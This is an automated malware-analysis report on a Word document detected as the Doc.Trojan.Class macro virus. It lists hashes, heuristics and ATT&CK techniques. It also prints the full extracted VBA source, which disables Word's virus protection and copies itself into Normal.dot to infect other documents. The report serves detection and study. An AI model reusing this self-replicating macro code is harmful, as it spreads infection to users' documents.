Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5d8c072af201bc07…

MALICIOUS

Office (OLE)

Size: 46.0 KB
Created: 2001-07-02 17:29:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 416d3b38580889edfcb085f90ca5b181
SHA-1: 5314e4ab372a862d59b6ee928d7d3d9c32da62f6
SHA-256: 5d8c072af201bc0721d21fd9af176edb1ed2e684e0893cd9b4cd320f0c16eb21
Risk score: 260

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic and VBA macros, including AutoOpen and AutoClose functions, indicating a macro-based attack. The AutoClose subroutine attempts to export a component to 'c:\class.sys' and then add it to the Normal.dot template, likely to establish persistence or execute a second-stage payload. The presence of ClamAV detections further supports its malicious nature.

Heuristics (5)

  • ClamAV: Doc.Trojan.Class-37 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Class-37
  • Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro [high] OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6993 bytes
SHA-256: eeacdf01f816aef6f19b01e89c89aca00a7e0ed3761f46f11d95bbc8574ce8fd
Detection: ClamAV: Doc.Trojan.Class-28
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AutoClose()
On Error GoTo out
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
If Date > #5/20/00# Then
End If
ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
If nt > 0 And nt < 3 Then NormalTemplate.VBProject.VBComponents.Item(1).codemodule.deletelines 1
If nt > 3 And ad > 3 Then GoTo out
If nt < 3 Then
    Set host = NormalTemplate.VBProject.VBComponents.Item(1)
    ActiveDocument.VBProject.VBComponents.Item(1).Name = host.Name
    ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\class.sys"
    host.codemodule.AddFromFile ("c:\class.sys")
    With host.codemodule
      For x = 1 To 4
       .deletelines 1
      Next x
      .replaceline 1, "Sub AutoClose()"
      .replaceline ad - 5, "Sub ViewVBCode()" '44
      .replaceline ad - 2, "Sub ToolsMacro()" '47
     End With
End If
If ad < 3 Then
 Set host = ActiveDocument.VBProject.VBComponents.Item(1)
 NormalTemplate.VBProject.VBComponents.Item(1).Export "c:\class.sys"
 host.codemodule.AddFromFile ("c:\class.sys")
 With host.codemodule
      For x = 1 To 4
       .deletelines 1
      Next x
      .replaceline 1, "Sub AutoOpen()"
      .replaceline nt - 5, "Sub ViewVBCode1()"
      .replaceline nt - 2, "Sub ToolsMacro1()"
     End With
End If
Kill "c:\class.sys"
For Each aTemp In Templates
    If LCase(aTemp.Name) = "Normal.dot" Then aTemp.Save
Next aTemp
out:
If nt > 3 And ad = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Sub ViewVBCode()
'123
End Sub
Sub ToolsMacro()
'123
End Sub

' Processing file: /opt/analyzer/scan_staging/65e925086ca24112a2b1d04892e65004.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8340 bytes
... (truncated)